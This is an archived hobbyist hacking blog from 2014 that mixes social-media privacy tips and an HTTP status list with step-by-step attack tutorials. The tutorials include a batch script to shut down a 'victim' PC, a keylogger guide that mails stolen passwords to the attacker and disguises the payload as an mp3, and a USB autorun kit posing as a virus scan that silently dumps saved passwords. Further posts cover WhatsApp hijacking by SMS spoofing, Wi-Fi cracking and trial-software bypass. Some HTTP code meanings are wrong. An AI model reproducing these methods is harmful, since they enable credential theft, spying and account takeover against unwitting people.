University of Hackers: February 2014

26/02/2014

How to keep yourselves safe on Social and other networks:

Gentlemen please spare few minutes to read it out. I will try to explain it as simple as possible!

As Social networking and other networks have grown on this planet, It is always better to omit information about yourself rather than include it on your social media.The best way to protect yourself is to not make yourself vulnerable in the first place. Whenever you engage in social media, remember this what happenson the internet stays on the internet, and it's up to you to make sure what appears in connection with your name and image does not have the potential to harm you now or in the future. Nowadays, we've paid a price few saw come: the loss of individual privacy. The impulse to share has caused many of us to inadvertently expose ourselves in ways that can compromise our safety and security. While social networking sites may feel like an invitation only gathering of friends that's accessible 24*7, it's not necessarily a closed and safe universe. Others may be able to access your personal information without your knowledge.!
Today i will describe some important safety tips that can help you and your family to protect yourselves! please don't ignore these tips because i have seen the depth of griefs inconveniently!

1) Every time you use Twitter, Facebook, Instagram, LinkedIn, Tagged, Meetup,Flickr, Orkut, Tumblr, Pinterest, VK, Emails, Blogs or other Networks the government keeps a copy of your activities. Sounds crazy, but it's true. According to the Library of Congress blog: "Every public activity, ever, since Network's inception in March 2006, will be archived digitally at the Library of Congress. Twitter processes more than 50 million tweets every day, with the total numbering in the billions." And experts predict the information will be searched and used in ways we can't even imagine.

2) You may think that you will delete your posts, images or any other activity but remember whenever you delete a thing from your account(s), it goes to archive section where they can be retrieved at any time.

3) Be cautious about using Geo-location services, Applications, Foursquare, or any method which shares where you're at.

4) Keep your privacy confidential. Keep your family safe, especially if you have a high profile position or work in a field that may expose you to high risk individuals. Some women have more than one social networking account, one for their professional/public lives and one that's restricted to personal concerns and only involves family and close friends. If this applies to you, make it clear to family/friends to post only to your personal account,not your professional page /account and don't let the names of spouses, children, relatives, parents, siblings appear there to protect their privacy. Don't let yourself be tagged in events, activities or photos that may reveal personal details about your life. If they show up, delete them first and explain later to the tagger and if you feel habitat to explain it to your tagger, go to your Settings and keep it turn on/off
better safe than habitat or Sorry.

5) If you must share your birthday, never keep the year visible in which you were born. Using the month and day doesn't matter, but adding the year provides an opportunity for identity theft.

6) Keep track of your Privacy Settings and check them on a regular basis or at least monthly. Do not think that the default setting will keep you safe.

7) If any of your family member are using Social Networks or any other account, try to check their activities regularly atleast once in a month.

8) Make it clear to family members that the best way of communicating with you is through private messaging or email, not posting on your wall or page. Often, relatives who are new to social media don't understand the difference between public and private conversations and how they take place Online. Don't hesitate to delete something that is too personal for fear of hurting someone's feelings, just make sure you message privately to explain your actions, or better yet, call on the phone.

9) Online games, quizzes, and other entertainment apps are fun, but they often pull information from your page and post it without your knowledge. Make sure that you know the guidelines of any app, game or service and do not allow it unfettered access to your information. Likewise, be cautious about responding to notes shared by friends along the lines of "10 Things You Didn't Know About Me." When you answer these and post them, you're revealing personal details about yourself that may enable others to figure out your address, your workplace, the name of your pet or your mother's maiden name (often used as an online security question), or even your password. Do enough of these over time and someone who is determined to learn all about you can read the answers, cross reference information obtained through your friends' pages, and glean a surprising amount from these seemingly casual revelations.

10) If you will be asked by a person who is personally known or unknown to you, about your Birth place, Maiden's name, what are your likes or dislikes or any other personal detail, don't share it at any cost as it can be used online for answering a security question to reset your Password.

11) Do not add unknown people in your friend list such as follower, subscriber or friend on your networks before review their info by looking the pages that they have liked, if you can't find any page liked by them, click on their friend list and check it out that what type of friends they have, if you can't find their friend lists due to their strict privacy, click on their profile picture and check their friend's info, it can help you to identify their personality.

12) Do not use copy past as it's the violation of copy right and never upload any other photo that are you downloading from other websites, blogs or pages because some of them are protected by copy right and can put you at risk. if you feel that the photo that you are going to upload, is important for you, see the address of that photo at the bottom of photo and contact the owner to ask for permission or write few words that the photo or post belong to( Write the owner name). it sounds crazy but can put you behind the four walls of prison.!!

13) Before you sign up on a Network, read it's the terms and conditions patiently!

23/02/2014

HTTP Status Codes

Many times when you are visiting a website or browsing a page you suddenly experience an error in the form of a code but you really don't know, what does these codes mean and why are you seeing an error! so today i am going to explain these codes with their meanings.
Before i explore, i would like to throw a light on HTTP:

HTTP: Stands for Hypertext Transfer Protocol. A protocol used to request and transmit files, especially webpages and webpage components, over the Internet or other computer network.

Now let's learn

1xx Informational
100 Continue
101 Switching Protocols

2xx Success
200 Done
201 Created
202 Accepted
203 Non-Authoritative Information
204 No Content Found
205 Reset Content
206 Partial Content

3xx Redirection
300 Multiple Choices
301 Moved Permanently
302 Content Found
303 See Other
304 Not Modified yet
305 Use Proxy
306 (Unused, Switch Proxy)
307 Temporary Redirect

4xx Client Error
400 Bad Request
401 Unauthorized access
402 Payment Required
403 Forbidden
404 Content/Page Not Found
405 Method Not Allowed
406 Not Acceptable
407 Proxy Authentication Required
408 Session expired
409 Conflict or Site/Page busy
410 Gone
411 Length Required
412 Precondition Failed
413 Request Entity Too Large
414 Requested URI Too Long
415 Unsupported Media Type
416 Requested Range Not Satisfiable
417 Expectation Failed

5xx Server Error
500 Internal Server Error
501 Not Implemented
502 Bad Gateway request
503 Service Unavailable
504 Gateway Timeout
505 HTTP Version Not Supported.

20/02/2014

How to speed up Mozilla Firefox 30 times faster:

By John Elwin

Open Mozilla Firefox Browser and type in address bar about:config

You get warning message,not bother about it just click on I’ll be careful, I promise "OK"

Add Open With Notepad in right Click (Context Menu) of Every File

How to Add Any Application in Right Click Context Menu2.

Now, Scroll down and look for the following entries:

network.http.pipelining

network.http.proxy.pipelining

network.http.pipelining.maxrequests

When you find the entries which describe above then do the following:

“network.http.pipelining” make this value to “true” from false. For making value true you just double click or just press return (enter) button onthe name.

“network.http.pipelining.maxrequests” make this value to “30″.It means it makes 30 requests at once.

“network.http.proxy.pipelining” make this value to “true”.

Now right click anywhere on the page and clickon New>Integer

Enter the preference name

nglayout.initialpaint.delay and set the integer value to 0.This is the amount of time browser waits before it acts to receive information.

Now whenever you load pages it will 30 times faster now.!!

Enjoy this article [Hack the Hacker]

19/02/2014

Shutdown Any Computer Remotely Using Command Prompt (CMD)

You may try this trick at any cyber cafe.
1. Open the command prompt. This may be done by clicking on the Start button and selecting Run.
2. Type cmd and press Enter.
3. Type shutdown -m\\computername,replacing"computername" with the name of the computer you wish to shutdown or the computer's IP address.
4. Experiment with the shutdown command's switches.
-r will force a restart, disabling any services or user interaction from interrupting it.
-c "comment" will force a comment to appear on the system being shutdown.
-t xx will force a timeout for "xx" seconds. For example, -t 60 would perform a shutdown after a 60-second timeout.
-a will abort the shutdown.
A full command example: shutdown -m\\myserver-r -c "This system will shutdown in 60 seconds" -t 60

ALTERNATIVE

1. Type shutdown -i in the run window.
2. Click the Add box and type the name of the computer you want to shutdown or its IP address. You can select what you want the computer to do.
3. In this mode, it's necessary to add a comment. Do so. Press OK.

INTERESTED IN .BAT FILES

1. Open Notepad and type:

@echo off echo.
set /p vic=Enter the IP of your victim:
shutdown -m \\%vic% -r -c "Your computer has been hacked. Shutdown in 20 seconds" -t 60
echo Victim Hacked....
pause
exit

2. Save it as anything.bat.
3. When you run it, it'll ask for your victim's IP. Enter it and you are done.

Love this article?

Share it with your friends on Facebook

Google Thinks It Can Replace Passwords With Inaudible Sounds Only Your Phone Can Hear:

Google has acquired SlickLogin, an Israeli startup that has developed an ingenious solution to the pain-in-the-butt that is "two-factor authentication" (when you have to Punch in your password and a code from a text message on your phone to access a web site or app).

The company lets your phone "listen" to a web site, and the confirmation of the unique inaudible sound confirms it's you trying to get access, not a hacker in a remote location.

You'd never need a password again just hold your phone near your computer.

Cult of Android explains it best:

Here’s how SlickLogin works. You visit a site that supports SlickLogin. Instead of entering a name or password, you simply hold your smartphone close to the laptop or computer you’re using, and entry is granted.

What’s really happening is that the web site is playing a sound, which is encrypted data encoded into ultra-sonic (higher than human hearing) sound. Your phone hears it, and sends the data back to the SlickLogin servers. That’s the authentication.

The sound code is different each time, so person requesting access has to be in the room every time — hackers can't do that.
---------------------------------------------------------
But i ( J.E ) think it's best option for Hackers to get easily into someone's account/System because a Hacker can generate these sounds in a single task!

17/02/2014

Internet Addresses - IPv4 and IPv6

By John Elwin
IPv4 stands for Internet Protocol version 4. It is the original standard set up for handling IP addresses when the Internet was initial developed by DARPA (Defense Advanced Research Projects Agency) in the early 1970s.

IPv4 is the underlying technology that makes it possible for us to connect our devices to the web. Whenever a device access the Internet (whether it's a PC, Mac, smartphone or other device), it is assigned a unique, numerical IP address such as 99.48.227.227. To send data from one computer to another through the web, a data packet must be transferred across the network containing the IP addresses of both devices.

Without IP addresses, computers would not be able to communicate and send data to each other. It's essential to the infrastructure of the web.

IPv4 addresses are all but consumed By 1992, the rapid explosion of the Internet fueled by the vast number of personal computers attaching to it, made it clear that the IPv4 address space was already consumed to the point that a replacement had to be found.

IPv6 was developed in response to this situation. IPv6 allocates 128 bits to map the Internet address space. The number of bits were not just doubled, but instead quadrupled from IPv4's 32 bits to insure that this address space would not run out any timesoon!

IPv6 is the sixth revision to the Internet Protocol and the successor to IPv4. It functions similarly to IPv4 in that it provides the unique, numerical IP addresses necessary for Internet-enabled devices to communicate.

IPv6 addresses will probably never run out 128 address bits provide IPv6 with 340,282,366,920,938,463,463,374,607,431,768,211,456 unique addresses. It may seem like overkill to have this many addresses available, However, many visionary individuals believe that eventually every wired and wireless computer, cell phone, PDA, household appliance, security camera, devices that haven't yet been invented, will each have their own unique Internet address.

Besides the huge number of IP addresses, IPv6 provides for better handling of voice than IPv4 which was not initially set up to handle it. This means that phone conversations over the Internet will be smooth and clear instead of choppy and broken up like they often are now.

The time is almost upon us when any device with an Internet address and a connection to the Internet can be monitored and controlled from anywhere in the world. While you're away on vacation you could turn on lights, change your thermostat, checksecurity cameras around your home, etc. The possibilities are only limited by our imagination!

16/02/2014

Kickstarter hacked,suggests you change your password immediately:

Kickstarter announced on its blog that it has been hacked, after the company was advised by law enforcement that hackers had gained private customer information on Wednesday night this week.

While the company says that no credit card information was accessed by hackers, it is advising all users of the service to reset their password immediately and ensure that any other accounts that use the same password are changed as soon as possible.

Unfortunately, other personal information including email addresses, mailing addresses, phone numbers and encrypted passwords were compromised in the attack. A Kickstarter staff member saidon Hacker News that older users’ passwords were encrypted using salted SHA1 on the site, but newer passwords use a method called ‘bcrypt’ which may be safer.

The company said on its blogthat it is “incredibly sorry that this happened” and that the “incident is frustrating and upsetting.” It continued, saying Kickstarter has “since improved our security procedures and systems in numerous ways and is working closely with law enforcement.”

If you have a Kickstarter account, you are advised reset your password immediately using a strong combination of punctuations!

15/02/2014

How to Use this Keylogger to hack Facebook,Gmail and other Password?

First make sure you have ‘Microsoft’s .net Framework‘ installed on your PC, if you dont have please download and install it.
The victim need not have .net framework. Follow the Steps below:

1: Download ‘Emissary Keylogger‘ Software and extract the files to desktop. If your Antivirus deletes the file, then please turn off your Antivirus or uninstallit and try downloading again.

2: Run ‘Emissary.exe’ file and enter your gmail account details, so that the password and other info of your victim can be mailed to you. If you are afraid of entering your gmail details, then do create one temporary fake account and enter those details.

3: After you enter your ‘Gmail account’ details Click on ‘Test’ to test the connection to your Gmail account. In the Server name Field you can change the name if you want. enter any Time Interval in the interval field. This timer controls the time interval between two keylogs emails. You can also show fake error message to your Victim when he clicks your server.exe file. to do so enter the error title and description in the ‘Fake error message’ field.

4: Now after filling the required fields, Click ‘Build button'. This will create another file called server.exe in the same directory.

5: Now send this server.exe file to victim and make him install it on his computer. You can use Binder or Crypter to bind this server.exe file with say any .mp3 file so that whenever victim runs mp3 file, server is automatically installed on his computer without his knowledge.

Now because this is a free keylogger, you can’t send server.exe file via email. Almost all email domains have security policy which does not allow sending .exe files. So to do this you need to compress the file with WinRar or upload it to Free File Storage Domains, like Media fire, rapid share, file thief etc.

6: Once the victim runs your sent keylogger file on his computer, it searches for all the stored usernames and passwords and it will send you email containing all keylogs and screenshots regularly after the specified ‘Time interval.

DISCLAIMER: The information provided by University of Hackers is to be used for educational purposes only and to help the reader to develop a hackers defense attitude discussed. The Author is not responsible for any misuse of the information provided. In no way should you use the information to cause any kind of damage directly or indirectly. You implement the information given at your own risk.!!

14/02/2014

How To Hide Files In A jpg Setup

i. Must have a .zip or .rar compressor.
ii. Willingness to learn.

1.Save the picture of choice to your desktop.
2.Make a new .rar or .zip folder on your desktop.
3. Add the files you want to hide into the .zip or .rar
4.Click start menu, run, cmd.
5.In Command Prompt type cd "desktop" with the quotation marks.
6.Now type in copy /b picturename.jpg + folder name.rar output file name.jpg ( If you use .zip then: copy /b picture name.jpg + folder name.zip output file name.jpg)
7.Now there should be the outputed file name with a .jpg extension on the desktop. ( Do not close Command Prompt just yet )
8.Double click it to open the picture and check it out.
9.When your done looking, and want to view the hidden files Type: ren output file name.jpg output file name.rar or zip Now you're done!

A quick info: With this technique of hiding files in a jpg you can send this to anyone and they just have to rename the file extension to zip or .rar. With this technique many operatives were able to send info to others secretively.

How To Hack Password using USB Drive

Today I will show you how to hack Passwords using an USB Pen Drive.
As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own Rootkit to hack passwords from your friend’s/college Computer.
We need the following tools to create our rootkit:
MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free. Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0 Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the Auto Complete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more.
PasswordFox: Password Fox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
Here is a step by step procedure to create the password hacking toolkit:
NOTE: You must temporarily disable your antivirus before following these steps.
1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive. ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it: [autorun] open=launch.bat ACTION= Perform a Virus Scan save the Notepad and rename it from New Text Document.txt to autorun.inf Now copy theautorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it: start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt save the Notepad and rename it from New Text Document.txt to launch.bat Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to hack the passwords. You can use this USB drive on your friend’s PC or on your college computer. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files. This hack works on Windows 2000, XP,Vista and 7 NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

13/02/2014

How to Access Another Computer Using an IP Address

1. Sign on to the other workstation as an administrator. Click "Start," enter "remote" into the search field and then select "Allow Remote Access to Your Computer."

Choose "Allow Connections Only From Computers Running Remote Desktop With Network Level Authentication" from under Remote Desktop.

3. Click "OK" to enable Remote Desktop connections on the target computer.

4.Navigate to Google.com and search for the term"what is my IP" to find your machine's public IP address. The message "Your Public IP Address is #.#.#.#" (in which each "#" is a number) will appear at the top of the search results.

5.Log in to the host computer(the work station you want to use to access the remote PC) with administrative rights and then click "Start>>All Programs>>Accessories>>Remote Desktop Connection.

6.Enter into the Computer field the Public IP address of the target PC. Click "Connect" and then enter your username and password to sign in to the workstation.

Hijacking Web Servers And Applications

Web applications provide an interface between end users and

web servers through a set of web pages that are generated at the

server end or contain script code to be executed dynamically

within the client web browser. These web applications are

publicly available and cannot be isolated completely and thus are

vulnerable to attacks like SQL injection, cross site scripting,

session hijacking etc.

The target information on a web server usually resides in a

database on the web server;

this database is accessed via a web application. For this reason,

web servers and web applications

go hand in hand. Compromising the web server is usually done

to gain access to the

underlying data in the web application.

Different methods followed for attacking a web server:

Ø Information gathering

Ø Vulnerability scanning

Ø Webserver footprinting

Ø Mirroring website

Ø Session hijacking

Ø Hacking webserver passwords

In information gathering phase attacker searches for

information about the target company with the help of Whois,

Traceroute, etc. tools.

For Webserver footprinting use tools like ID Serve, httprecon and

netcraft to gather account details, operating system, database

schema, etc. One can even use telnet to gather information like

server name, server type, operating system, etc.

To mirror a website use tools like HTTrack, Web Copier,

BlackWidow, etc. to mirror a website.

Use tools like Nessus, paros proxy, etc. for vulnerability scanning

to find weaknesses in a network like any outdated content or

misconfiguration.

To perform session hijacking use tools like burp suite, hamster,

firesheep etc. and capture valid session cookies and IDs.

To crack passwords use tools like Brutus, THC-hydra, etc. one

can even pretend a a legitimate site that is asking to change

password or eve one can exploit ’Remember Me’ as it uses

simple persistent cookie. Cookies get stolen by techniques like

script injection and eavesdropping. Tools like Burp Suite and

paros proxy can trap cookies.

Many web application threats exist on a web server like:

Cross-Site Scripting: Cross site scripting is nothing but injection

of client side scripts into a website.

This can easily be done using all the various ways a website is

collecting inputs like text box, query strings, etc.

Validating cookies, query strings, form fields, and hidden fields

can prevent cross-site scripting

SQL Injection Inserting SQL commands into the URL gets the

database server to dump,

alter, delete, or create information in the database.

Command Injection The hacker inserts programming

commands into a web form.

Using language-specific libraries for the programming language.

Cookie Poisoning and Snooping The hacker corrupts or steals

cookies. So don’t store passwords in a cookie, implement cookie

timeouts, and authenticate cookies.

Buffer Overflow Huge amounts of data are sent to a web

application through a web form

to execute commands. Thus one must validate user input length,

perform bounds checking.

Authentication Hijacking The hacker steals a session once a

user has authenticated.

This can be prevented by using SSL to encrypt traffic.

Wget is a command-line tool that a hacker can use to download

an entire website,

complete with all the files. The hacker can view the source code

offline and test certain

attacks prior to launching them against the real web server.

WebSleuth is a tool that can pull all the email addresses from

different pages of a website.

BlackWidow can scan and map all the pages of a website to

create a mirrored site.

WSDigger is a web services testing tool that contains sample

attack plug-ins for SQL

injection, cross-site scripting, and other web attacks.

How To Hijack Hack WhatsApp:

Hijack & Hack WhatsApp In Easy Steps:

Hijack (someone else’s) Whatsapp with your iPhone If you want to hijack someone else’s Whatsapp and receive messages addressed to that person with your iPhone, read on. (You don’t have an iPhone? see bottom)
When you install Whatsapp on your iPhone, the Whatsapp application makes contact with the Whatsapp servers, and the Whatsapp servers will send you a verification sms with a code in it. Straight from that point a counter will start counting in the Whatsapp application. Within this time Whatsapp expects you to receive your verification SMS. If this period expires Whatsapp offers you several other authentication methods.Here you choose for the option “SMS”. And you will have to fill in your email adress, Your Phone will now start sending an SMS to the whatsapp servers for verification. You can cancel this, as it is not necessary.What you’re going to do next is called SMS-spoofing. You can do this via many sites on the web. Choose one, and make up your fake SMS as shown below:
To: (Your phone No.)
From: +(Country code)(mobile number)
Message: (your email address) That’s all! Within minutes you will receive the activation code in your email to activate whatsapp on your iPhone with someone else’s Telephone number, and from that moment on you will receive message’s addressed to that person on your iPhone.The only way for Whatsapp to solve this issue is sending the verification SMS from their own servers and no other way.If you have anything other than an iPhone your also able to Hijack someone else’s Whatsapp. It’s even easier for you.All other systems will start sending an SMS verification immediately from your own mobile phone! So you disconnect your mobile phone, try to send the verification sms, which is impossible since you disconnected it. Check your outbox. There you will see the verification sms. Copy that whole sms to a website where you can spoof SMS. State the FROM field as the person’s Whatsapp you want to hijack, and fill in your own mobile number in the to field.

12/02/2014

Bluetooth Hacking

Bluetooth hacking means compromising sensitive data in

Bluetooth-enabled devices and networks.

By Bluetooth hacking one can send number of packets and crash

a device.

Super Bluetooth Hack is a tool which infects the attacker with

Bluetooth AT commands. Once infected, one can read messages

and contacts, change profile, make calls, etc.

PhoneSnoop is a Blackberry spyware which activates the

microphone of a blackberry phone and listen to sounds near or

around it. This tool is used to conduct surveillance on an

individual.

BlueScanner is a Bluetooth discovery and vulnerability

assessment tool for windows. It can gather all information from

te device, without authenticating with the device.

To prevent one must:

Ø Keep the device in non-discoverable mode

Ø Disable Bluetooth when not in use

Ø Do not accept unknown requests

DISCLAIMER: The information provided by University of Hackers is to be used for educational purposes only and to help the reader to develop a hackers defense attitude discussed. The Author is not responsible for any misuse of the information provided. In no way should you use the information to cause any kind of damage directly or indirectly. You implement the information given at your own risk.!!

Wi-Fi Hacking

Wi-Fi is developed on IEEE 802.11 standards, and it is widely

used in wireless communication. It provides wireless access to

applications and data across a radio network.

With the increase of Wi-Fi hotspots to the rising number of

smart

phones, PDAs, and laptops equipped with Wi-Fi radios, wireless

security is an ever increasing

issue for many organizations.

To authenticate on a wireless network there are two methods:
Open system does not provide any

security mechanisms but is simply a request to make a

connection to the network. Sharedkey

authentication has the wireless client hash a string of challenge

text with the Wired

Equivalent Privacy (WEP) key to authenticate the client to the

network.

WEP encryption can be easily cracked as it was developed

without public or cryptologists review and has several

vulnerabilities.

The Wi-Fi Alliance created additional security certifications

known

as Wi-Fi Protected Access (WPA) and WPA2 to fill the gap

between the original 802.11

standard and the latest 802.11i amendment.

WPA and WPA2 improves authentication and encryption features

of WEP.

To break WEP encryption:

Ø Find a nearest Wi-Fi hotspot

Ø Use tools like aireplay-ng to do a fake authentication with

the access point

Ø Run tools like Cain & Abel to extract encryption keys

Ø Start a Wi-Fi packet encryption tool such as aireplay-ng in

ARP request replay mode to inject packets.

To break WPA/WPA2 Encryption:

Ø As they use user defined password one must launch brute-

force or dictionary attacks. But, its very difficult to crack

a strong password.

Ø Use tools like aircrack, airplay to brute-force WPA keys

Ø WPA keys can be cracked offline by capturing the

authentication handshake for few seconds and then

cracking keys offline

Ø One can even force the client to disconnect and capture

the reconnect packet using tools like airplay.

To find a Wi-Fi hotspot one can take the help Wi-Fi finders like

inSSIDder, NetSurveyor, jiwire.com, wefi.com, etc. one can even

use wireless antenna like unidirectional antenna, parabolic grid

antenna, etc. which can pick up Wi-Fi signals from miles.

Man In The Middle Attack:

Ø Run airmon-ng in monitor mode

Ø Start airodump to discover SSIDs on interface

Ø De-authenticate the client using aireplay-ng

Ø Associate your Wi-Fi card with the access point you are

accessing with aireplay-ng

One can set up a fake access point and lure user to connect. Once

connected attacker can bypass the enterprise security policies

giving attackers access to network data.

To set up a fake hotspot:

Ø You need a laptop with internet connectivity and mini

access point.

Ø Enable internet connection sharing in your operating

system

Ø Broadcast your Wi-Fi connection and run a sniffer

program to capture passwords.

Tools like AirDefense, AirMagnet, Adaptive Wireless IPS, etc.

can be used to prevent Wi-Fi hacking.!!

10/02/2014

How to use a trail program/software forever

In this post I’ll show you how to “hack” a Software and run the trial program forever. Most of us are familiar with many software's that run only for a specified period of time in the trial mode. Once the trial period is expired these software's stop functioning and demand for a purchase. But there is a way to run the software's and make them function beyond the trial period. Isn’t this interesting? Before I tell you how to “hack” the software and make it run in the trial mode forever, we have to understand the functioning of these software's. I’ll try to explain this in brief. When these software's are installed for the first time, they make an entry into the Windows Registry with the details such as Installed Date and Time, installed path etc. After installation every time you run the software, it compares the current system date and time with the installed date and time. So, with this it can make out whether the trial period is expired or not. So with this being the case, just manually changing the system date to an earlier date will not solve the problem. For this purpose there is a small Tool known as RunAsDate. RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application. RunAsDate intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify. It works with Windows 2000, XP, 2003 and Vista

09/02/2014

How To Remotely Shutdown Your PC Using A Cell Phone!

How to Shutdown a Computer with a Cell Phone Using this method, a user can shutdown, restart, hibernate, etc. his or her computer, just by sending an email from his or her phone. To do this, all you will need is Microsoft Outlook which should come with Microsoft Office, which most people have. This will need to be on the computer wish you wish to shutdown. So, this is how you do this: 1. First, you need the batch files to perform the Shutdown, Hibernate etc. You can write them down yourselves or can download them from here . 2. Extract them to your C:\ drive so the path to the shutdown batch file is C:\sms_functions\shutdown.bat (Important this is a must the path must be exact) or you can modify the rule once you import it to point to the new destination, it's your call. 3. Open up Microsoft Outlook. Make sure that you have already configured it for your email.Now we will need to make it so that Outlook checks your inbox about every minute (1 minute for testing time can be increased if a delayed shutdown is desired). You can do this by going to Tools: Options. 4. Then click the Mail Setup tab, and afterwards, the Send/Receive button. 5. Make sure that the Schedule an automatic send/receive every... box is checked, and set the number of minutes to 1. Now you may close all of these dialog boxes. 6.Now go to Tools: Rules and Alerts... Next click the options button in the upper right hand corner and press the Import Rules button. 7.Now select the shutdown.rwz file that was found in the zip file named sms_functions that you downloaded. 8. Now, when you send a message from your phone to your e-mail address with the subject smsshutdown%%, your computer will shutdown. You can also make your own rule, so that you can use your own batch file, and may specify the phrase you want to trigger the action

Subscribe to: Posts ( Atom )